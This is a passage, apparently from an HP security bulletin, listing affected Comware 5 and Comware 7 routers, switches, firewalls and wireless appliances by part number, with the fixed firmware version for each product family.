- JG356A HP 6600 MCP-X2 Router Main Processing Unit
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
- JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit
HSR6800 (Comware 5) - Version: R3303P28
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit
MSR20 (Comware 5) - Version: R2516
- HP Network Products
- JD432A HP A-MSR20-21 Router
- JD662A HP MSR20-20 Router
- JD663A HP A-MSR20-21 Router
- JD663B HP MSR20-21 Router
- JD664A HP MSR20-40 Router
- JF228A HP MSR20-40 Router
- JF283A HP MSR20-20 Router
MSR20-1X (Comware 5) - Version: R2516
- HP Network Products
- JD431A HP MSR20-10 Router
- JD667A HP MSR20-15 IW Multi-Service Router
- JD668A HP MSR20-13 Multi-Service Router
- JD669A HP MSR20-13 W Multi-Service Router
- JD670A HP MSR20-15 A Multi-Service Router
- JD671A HP MSR20-15 AW Multi-Service Router
- JD672A HP MSR20-15 I Multi-Service Router
- JD673A HP MSR20-11 Multi-Service Router
- JD674A HP MSR20-12 Multi-Service Router
- JD675A HP MSR20-12 W Multi-Service Router
- JD676A HP MSR20-12 T1 Multi-Service Router
- JF236A HP MSR20-15-I Router
- JF237A HP MSR20-15-A Router
- JF238A HP MSR20-15-I-W Router
- JF239A HP MSR20-11 Router
- JF240A HP MSR20-13 Router
- JF241A HP MSR20-12 Router
- JF806A HP MSR20-12-T Router
- JF807A HP MSR20-12-W Router
- JF808A HP MSR20-13-W Router
- JF809A HP MSR20-15-A-W Router
- JF817A HP MSR20-15 Router
- JG209A HP MSR20-12-T-W Router (NA)
- JG210A HP MSR20-13-W Router (NA)
MSR 30 (Comware 5) - Version: R2516
- HP Network Products
- JD654A HP MSR30-60 POE Multi-Service Router
- JD657A HP MSR30-40 Multi-Service Router
- JD658A HP MSR30-60 Multi-Service Router
- JD660A HP MSR30-20 POE Multi-Service Router
- JD661A HP MSR30-40 POE Multi-Service Router
- JD666A HP MSR30-20 Multi-Service Router
- JF229A HP MSR30-40 Router
- JF230A HP MSR30-60 Router
- JF232A HP RTMSR3040-AC-OVSAS-H3
- JF235A HP MSR30-20 DC Router
- JF284A HP MSR30-20 Router
- JF287A HP MSR30-40 DC Router
- JF801A HP MSR30-60 DC Router
- JF802A HP MSR30-20 PoE Router
- JF803A HP MSR30-40 PoE Router
- JF804A HP MSR30-60 PoE Router
- JG728A HP MSR30-20 TAA-compliant DC Router
- JG729A HP MSR30-20 TAA-compliant Router
MSR 30-16 (Comware 5) - Version: R2516
- HP Network Products
- JD659A HP MSR30-16 POE Multi-Service Router
- JD665A HP MSR30-16 Multi-Service Router
- JF233A HP MSR30-16 Router
- JF234A HP MSR30-16 PoE Router
MSR 30-1X (Comware 5) - Version: R2516
- HP Network Products
- JF800A HP MSR30-11 Router
- JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr
- JG182A HP MSR30-11E Router
- JG183A HP MSR30-11F Router
- JG184A HP MSR30-10 DC Router
MSR 50 (Comware 5) - Version: R2516
- HP Network Products
- JD433A HP MSR50-40 Router
- JD653A HP MSR50 Processor Module
- JD655A HP MSR50-40 Multi-Service Router
- JD656A HP MSR50-60 Multi-Service Router
- JF231A HP MSR50-60 Router
- JF285A HP MSR50-40 DC Router
- JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply
MSR 50-G2 (Comware 5) - Version: R2516
- HP Network Products
- JD429A HP MSR50 G2 Processor Module
- JD429B HP MSR50 G2 Processor Module
MSR 9XX (Comware 5) - Version: R2516
- HP Network Products
- JF812A HP MSR900 Router
- JF813A HP MSR920 Router
- JF814A HP MSR900-W Router
- JF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr
- JG207A HP MSR900-W Router (NA)
- JG208A HP MSR920-W Router (NA)
MSR 93X (Comware 5) - Version: R2516
- HP Network Products
- JG511A HP MSR930 Router
- JG511B HP MSR930 Router
- JG512A HP MSR930 Wireless Router
- JG513A HP MSR930 3G Router
- JG513B HP MSR930 3G Router
- JG514A HP MSR931 Router
- JG514B HP MSR931 Router
- JG515A HP MSR931 3G Router
- JG516A HP MSR933 Router
- JG517A HP MSR933 3G Router
- JG518A HP MSR935 Router
- JG518B HP MSR935 Router
- JG519A HP MSR935 Wireless Router
- JG520A HP MSR935 3G Router
- JG531A HP MSR931 Dual 3G Router
- JG531B HP MSR931 Dual 3G Router
- JG596A HP MSR930 4G LTE/3G CDMA Router
- JG597A HP MSR936 Wireless Router
- JG665A HP MSR930 4G LTE/3G WCDMA Global Router
- JG704A HP MSR930 4G LTE/3G WCDMA ATT Router
- JH009A HP MSR931 Serial (TI) Router
- JH010A HP MSR933 G.SHDSL (TI) Router
- JH011A HP MSR935 ADSL2+ (TI) Router
- JH012A HP MSR930 Wireless 802.11n (NA) Router
- JH012B HP MSR930 Wireless 802.11n (NA) Router
- JH013A HP MSR935 Wireless 802.11n (NA) Router
MSR1000 (Comware 5) - Version: See Mitigation
- HP Network Products
- JG732A HP MSR1003-8 AC Router
12500 (Comware 5) - Version: R1829P02
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JC808A HP 12500 TAA Main Processing Unit
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
9500E (Comware 5) - Version: R1829P02
- HP Network Products
- JC124A HP A9508 Switch Chassis
- JC124B HP 9505 Switch Chassis
- JC125A HP A9512 Switch Chassis
- JC125B HP 9512 Switch Chassis
- JC474A HP A9508-V Switch Chassis
- JC474B HP 9508-V Switch Chassis
10500 (Comware 5) - Version: R1210P02
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC614A HP 10500 Main Processing Unit
- JC748A HP 10512 Switch Chassis
- JG375A HP 10500 TAA-compliant Main Processing Unit
- JG820A HP 10504 TAA-compliant Switch Chassis
- JG821A HP 10508 TAA-compliant Switch Chassis
- JG822A HP 10508-V TAA-compliant Switch Chassis
- JG823A HP 10512 TAA-compliant Switch Chassis
7500 (Comware 5) - Version: R6710P02
- HP Network Products
- JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port Gig-T/4-port GbE Combo
- JC697A HP 7502 TAA-compliant Main Processing Unit
- JC698A HP 7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8 GbE Combo Ports
- JC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP Ports
- JC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit
- JC701A HP 7500 768Gbps TAA-compliant Fabric / Main Processing Unit
- JD193A HP 7500 384Gbps Fabric Module with 2 XFP Ports
- JD193B HP 7500 384Gbps Fabric Module with 2 XFP Ports
- JD194A HP 7500 384Gbps Fabric Module
- JD194B HP 7500 384Gbps Fabric Module
- JD195A HP 7500 384Gbps Advanced Fabric Module
- JD196A HP 7502 Fabric Module
- JD220A HP 7500 768Gbps Fabric Module
- JD224A HP 7500 384Gbps Fabric Module with 12 SFP Ports
- JD238A HP 7510 Switch Chassis
- JD238B HP 7510 Switch Chassis
- JD239A HP 7506 Switch Chassis
- JD239B HP 7506 Switch Chassis
- JD240A HP 7503 Switch Chassis
- JD240B HP 7503 Switch Chassis
- JD241A HP 7506-V Switch Chassis
- JD241B HP 7506-V Switch Chassis
- JD242A HP 7502 Switch Chassis
- JD242B HP 7502 Switch Chassis
- JD243A HP 7503-S Switch Chassis with 1 Fabric Slot
- JD243B HP 7503-S Switch Chassis with 1 Fabric Slot
- JE164A HP E7902 Switch Chassis
- JE165A HP E7903 Switch Chassis
- JE166A HP E7903 1 Fabric Slot Switch Chassis
- JE167A HP E7906 Switch Chassis
- JE168A HP E7906 Vertical Switch Chassis
- JE169A HP E7910 Switch Chassis
6125G/XG Blade Switch - Version: R2112P05
- HP Network Products
- 737220-B21 HP 6125G Blade Switch with TAA
- 737226-B21 HP 6125G/XG Blade Switch with TAA
- 658250-B21 HP 6125G/XG Blade Switch Opt Kit
- 658247-B21 HP 6125G Blade Switch Opt Kit
5830 (Comware 5) - Version: R1118P13
- HP Network Products
- JC691A HP 5830AF-48G Switch with 1 Interface Slot
- JC694A HP 5830AF-96G Switch
- JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot
- JG374A HP 5830AF-96G TAA-compliant Switch
5800 (Comware 5) - Version: R1810P03
- HP Network Products
- JC099A HP 5800-24G-PoE Switch
- JC099B HP 5800-24G-PoE+ Switch
- JC100A HP 5800-24G Switch
- JC100B HP 5800-24G Switch
- JC101A HP 5800-48G Switch with 2 Slots
- JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots
- JC103A HP 5800-24G-SFP Switch
- JC103B HP 5800-24G-SFP Switch with 1 Interface Slot
- JC104A HP 5800-48G-PoE Switch
- JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot
- JC105A HP 5800-48G Switch
- JC105B HP 5800-48G Switch with 1 Interface Slot
- JG254A HP 5800-24G-PoE+ TAA-compliant Switch
- JG254B HP 5800-24G-PoE+ TAA-compliant Switch
- JG255A HP 5800-24G TAA-compliant Switch
- JG255B HP 5800-24G TAA-compliant Switch
- JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot
- JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot
- JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot
- JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot
- JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot
- JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot
- JG225A HP 5800AF-48G Switch
- JG225B HP 5800AF-48G Switch
- JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots
- JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface
- JG243A HP 5820-24XG-SFP+ TAA-compliant Switch
- JG243B HP 5820-24XG-SFP+ TAA-compliant Switch
- JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots & 1 OAA Slot
- JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot
- JC106A HP 5820-14XG-SFP+ Switch with 2 Slots
- JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots & 1 OAA Slot
- JG219A HP 5820AF-24XG Switch
- JG219B HP 5820AF-24XG Switch
- JC102A HP 5820-24XG-SFP+ Switch
- JC102B HP 5820-24XG-SFP+ Switch
5500 HI (Comware 5) - Version: R5501P21
- HP Network Products
- JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots
- JG312A HP 5500-48G-4SFP HI Switch with 2 Interface Slots
- JG541A HP 5500-24G-PoE+-4SFP HI Switch with 2 Interface Slots
- JG542A HP 5500-48G-PoE+-4SFP HI Switch with 2 Interface Slots
- JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots
- JG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots
- JG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots
- JG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots
5500 EI (Comware 5) - Version: R2221P22
- HP Network Products
- JD373A HP 5500-24G DC EI Switch
- JD374A HP 5500-24G-SFP EI Switch
- JD375A HP 5500-48G EI Switch
- JD376A HP 5500-48G-PoE EI Switch
- JD377A HP 5500-24G EI Switch
- JD378A HP 5500-24G-PoE EI Switch
- JD379A HP 5500-24G-SFP DC EI Switch
- JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots
- JG241A HP 5500-24G-PoE+ EI Switch with 2 Interface Slots
- JG249A HP 5500-24G-SFP EI TAA-compliant Switch with 2 Interface
- JG250A HP 5500-24G EI TAA-compliant Switch with 2 Interface Slots
- JG251A HP 5500-48G EI TAA-compliant Switch with 2 Interface Slots
- JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with 2 Interface Slots
- JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2 Interface Slots
4800G (Comware 5) - Version: R2221P22
- HP Network Products
- JD007A HP 4800-24G Switch
- JD008A HP 4800-24G-PoE Switch
- JD009A HP 4800-24G-SFP Switch
- JD010A HP 4800-48G Switch
- JD011A HP 4800-48G-PoE Switch
5500SI (Comware 5) - Version: R2221P22
- HP Network Products
- JD369A HP 5500-24G SI Switch
- JD370A HP 5500-48G SI Switch
- JD371A HP 5500-24G-PoE SI Switch
- JD372A HP 5500-48G-PoE SI Switch
- JG238A HP 5500-24G-PoE+ SI Switch with 2 Interface Slots
- JG239A HP 5500-48G-PoE+ SI Switch with 2 Interface Slots
4500G (Comware 5) - Version: R2221P22
- HP Network Products
- JF428A HP 4510-48G Switch
- JF847A HP 4510-24G Switch
5120 EI (Comware 5) - Version: R2221P22
- HP Network Products
- JE066A HP 5120-24G EI Switch
- JE067A HP 5120-48G EI Switch
- JE068A HP 5120-24G EI Switch with 2 Interface Slots
- JE069A HP 5120-48G EI Switch with 2 Interface Slots
- JE070A HP 5120-24G-PoE EI 2-slot Switch
- JE071A HP 5120-48G-PoE EI 2-slot Switch
- JG236A HP 5120-24G-PoE+ EI Switch with 2 Interface Slots
- JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots
- JG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots
- JG246A HP 5120-48G EI TAA-compliant Switch with 2 Interface Slots
- JG247A HP 5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots
- JG248A HP 5120-48G-PoE+ EI TAA-compliant Switch with 2 Slots
4210G (Comware 5) - Version: R2221P22
- HP Network Products
- JF844A HP 4210-24G Switch
- JF845A HP 4210-48G Switch
- JF846A HP 4210-24G-PoE Switch
5120 SI (Comware 5) - Version: R1517
- HP Network Products
- JE072A HP 5120-48G SI Switch
- JE072B HPE 5120 48G SI Switch
- JE073A HP 5120-16G SI Switch
- JE073B HPE 5120 16G SI Switch
- JE074A HP 5120-24G SI Switch
- JE074B HPE 5120 24G SI Switch
- JG091A HP 5120-24G-PoE+ (370W) SI Switch
- JG091B HPE 5120 24G PoE+ (370W) SI Switch
- JG092A HP 5120-24G-PoE+ (170W) SI Switch
- JG309B HPE 5120 8G PoE+ (180W) SI Switch
- JG310B HPE 5120 8G PoE+ (65W) SI Switch
3610 (Comware 5) - Version: R5319P15
- HP Network Products
- JD335A HP 3610-48 Switch
- JD336A HP 3610-24-4G-SFP Switch
- JD337A HP 3610-24-2G-2G-SFP Switch
- JD338A HP 3610-24-SFP Switch
3600V2 (Comware 5) - Version: R2111P01
- HP Network Products
- JG299A HP 3600-24 v2 EI Switch
- JG299B HP 3600-24 v2 EI Switch
- JG300A HP 3600-48 v2 EI Switch
- JG300B HP 3600-48 v2 EI Switch
- JG301A HP 3600-24-PoE+ v2 EI Switch
- JG301B HP 3600-24-PoE+ v2 EI Switch
- JG301C HP 3600-24-PoE+ v2 EI Switch
- JG302A HP 3600-48-PoE+ v2 EI Switch
- JG302B HP 3600-48-PoE+ v2 EI Switch
- JG302C HP 3600-48-PoE+ v2 EI Switch
- JG303A HP 3600-24-SFP v2 EI Switch
- JG303B HP 3600-24-SFP v2 EI Switch
- JG304A HP 3600-24 v2 SI Switch
- JG304B HP 3600-24 v2 SI Switch
- JG305A HP 3600-48 v2 SI Switch
- JG305B HP 3600-48 v2 SI Switch
- JG306A HP 3600-24-PoE+ v2 SI Switch
- JG306B HP 3600-24-PoE+ v2 SI Switch
- JG306C HP 3600-24-PoE+ v2 SI Switch
- JG307A HP 3600-48-PoE+ v2 SI Switch
- JG307B HP 3600-48-PoE+ v2 SI Switch
- JG307C HP 3600-48-PoE+ v2 SI Switch
3100V2 (Comware 5) - Version: R5213P01
- HP Network Products
- JD313B HPE 3100 24 PoE v2 EI Switch
- JD318B HPE 3100 8 v2 EI Switch
- JD319B HPE 3100 16 v2 EI Switch
- JD320B HPE 3100 24 v2 EI Switch
- JG221A HPE 3100 8 v2 SI Switch
- JG222A HPE 3100 16 v2 SI Switch
- JG223A HPE 3100 24 v2 SI Switch
HP870 (Comware 5) - Version: R2607P51
- HP Network Products
- JG723A HP 870 Unified Wired-WLAN Appliance
- JG725A HP 870 Unified Wired-WLAN TAA-compliant Appliance
HP850 (Comware 5) - Version: R2607P51
- HP Network Products
- JG722A HP 850 Unified Wired-WLAN Appliance
- JG724A HP 850 Unified Wired-WLAN TAA-compliant Appliance
HP830 (Comware 5) - Version: R3507P51
- HP Network Products
- JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch
- JG641A HP 830 8-port PoE+ Unified Wired-WLAN Switch
- JG646A HP 830 24-Port PoE+ Unified Wired-WLAN TAA-compliant Switch
- JG647A HP 830 8-Port PoE+ Unified Wired-WLAN TAA-compliant
HP6000 (Comware 5) - Version: R2507P44
- HP Network Products
- JG639A HP 10500/7500 20G Unified Wired-WLAN Module
- JG645A HP 10500/7500 20G Unified Wired-WLAN TAA-compliant Module
WX5004-EI (Comware 5) - Version: R2507P44
- HP Network Products
- JD447B HP WX5002 Access Controller
- JD448A HP WX5004 Access Controller
- JD448B HP WX5004 Access Controller
- JD469A HP WX5004 Access Controller
SecBlade FW (Comware 5) - Version: R3181P07
- HP Network Products
- JC635A HP 12500 VPN Firewall Module
- JD245A HP 9500 VPN Firewall Module
- JD249A HP 10500/7500 Advanced VPN Firewall Module
- JD250A HP 6600 Firewall Processing Router Module
- JD251A HP 8800 Firewall Processing Module
- JD255A HP 5820 VPN Firewall Module
F1000-E (Comware 5) - Version: TBD still fixing
- HP Network Products
- JD272A HP F1000-E VPN Firewall Appliance
F1000-A-EI (Comware 5) - Version: TBD still fixing
- HP Network Products
- JG214A HP F1000-A-EI VPN Firewall Appliance
F1000-S-EI (Comware 5) - Version: TBD still fixing
- HP Network Products
- JG213A HP F1000-S-EI VPN Firewall Appliance
F5000-A (Comware 5) - Version: F3210P26
- HP Network Products
- JD259A HP A5000-A5 VPN Firewall Chassis
- JG215A HP F5000 Firewall Main Processing Unit
- JG216A HP F5000 Firewall Standalone Chassis
U200S and CS (Comware 5) - Version: F5123P33
- HP Network Products
- JD273A HP U200-S UTM Appliance
U200A and M (Comware 5) - Version: F5123P33
- HP Network Products
- JD275A HP U200-A UTM Appliance
F5000-C/S (Comware 5) - Version: TBD still fixing
- HP Network Products
- JG650A HP F5000-C VPN Firewall Appliance
- JG370A HP F5000-S VPN Firewall Appliance
SecBlade III (Comware 5) - Version: TBD still fixing
- HP Network Products
- JG371A HP 12500 20Gbps VPN Firewall Module
- JG372A HP 10500/11900/7500 20Gbps VPN Firewall Module
6600 RSE RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JC177A HP 6608 Router
- JC177B HP 6608 Router Chassis
- JC178A HP 6604 Router Chassis
- JC178B HP 6604 Router Chassis
- JC496A HP 6616 Router Chassis
- JC566A HP 6600 RSE-X1 Router Main Processing Unit
- JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit
6600 RPE RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JC165A HP 6600 RPE-X1 Router Module
- JC177A HP 6608 Router
- JC177B HPE FlexNetwork 6608 Router Chassis
- JC178A HPE FlexNetwork 6604 Router Chassis
- JC178B HPE FlexNetwork 6604 Router Chassis
- JC496A HPE FlexNetwork 6616 Router Chassis
- JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit
6602 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JC176A HP 6602 Router Chassis
HSR6602 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JC177A HP 6608 Router
- JC177B HP 6608 Router Chassis
- JC178A HP 6604 Router Chassis
- JC178B HP 6604 Router Chassis
- JC496A HP 6616 Router Chassis
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG355A HP 6600 MCP-X1 Router Main Processing Unit
- JG356A HP 6600 MCP-X2 Router Main Processing Unit
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
- JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit
HSR6800 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit
SMB1910 (Comware 5) - Version: R1113
- HP Network Products
- JG540A HP 1910-48 Switch
- JG539A HP 1910-24-PoE+ Switch
- JG538A HP 1910-24 Switch
- JG537A HP 1910-8 -PoE+ Switch
- JG536A HP 1910-8 Switch
SMB1920 (Comware 5) - Version: R1112
- HP Network Products
- JG928A HP 1920-48G-PoE+ (370W) Switch
- JG927A HP 1920-48G Switch
- JG926A HP 1920-24G-PoE+ (370W) Switch
- JG925A HP 1920-24G-PoE+ (180W) Switch
- JG924A HP 1920-24G Switch
- JG923A HP 1920-16G Switch
- JG922A HP 1920-8G-PoE+ (180W) Switch
- JG921A HP 1920-8G-PoE+ (65W) Switch
- JG920A HP 1920-8G Switch
V1910 (Comware 5) - Version: R1517P01
- HP Network Products
- JE005A HP 1910-16G Switch
- JE006A HP 1910-24G Switch
- JE007A HP 1910-24G-PoE (365W) Switch
- JE008A HP 1910-24G-PoE(170W) Switch
- JE009A HP 1910-48G Switch
- JG348A HP 1910-8G Switch
- JG349A HP 1910-8G-PoE+ (65W) Switch
- JG350A HP 1910-8G-PoE+ (180W) Switch
SMB 1620 (Comware 5) - Version: R1110
- HP Network Products
- JG914A HP 1620-48G Switch
- JG913A HP 1620-24G Switch
- JG912A HP 1620-8G Switch
NJ5000 - Version: R1107
- HP Network Products
- JH237A HPE FlexNetwork NJ5000 5G PoE+ Walljack

COMWARE 7 Products

12500 (Comware 7) - Version: R7377
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
10500 (Comware 7) - Version: R7180
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG608A HP FlexFabric 11908-V Switch Chassis
- JG609A HP FlexFabric 11900 Main Processing Unit
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit
12900 (Comware 7) - Version: R1150
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
5900 (Comware 7) - Version: R2432P01
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG296A HP 5920AF-24XG Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG555A HP 5920AF-24XG TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
MSR1000 (Comware 7) - Version: R0306P12
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
MSR2000 (Comware 7) - Version: R0306P12
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
MSR3000 (Comware 7) - Version: R0306P12
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
MSR4000 (Comware 7) - Version: R0306P12
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
VSR (Comware 7) - Version: E0322P01
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
7900 (Comware 7) - Version: R2150
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
5130 (Comware 7) - Version: R3113P02
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
6125XLG - Version: R2432P01
- HP Network Products
- 711307-B21 HP 6125XLG Blade Switch
- 737230-B21 HP 6125XLG Blade Switch with TAA
6127XLG - Version: R2432P01
- HP Network Products
- 787635-B21 HP 6127XLG Blade Switch Opt Kit
- 787635-B22 HP 6127XLG Blade Switch with TAA
Moonshot - Version: R2432P01
- HP Network Products
- 786617-B21 - HP Moonshot-45Gc Switch Module
- 704654-B21 - HP Moonshot-45XGc Switch Module
- 786619-B21 - HP Moonshot-180XGc Switch Module
5700 (Comware 7) - Version: R2432P01
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
5930 (Comware 7) - Version: R2432P01
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
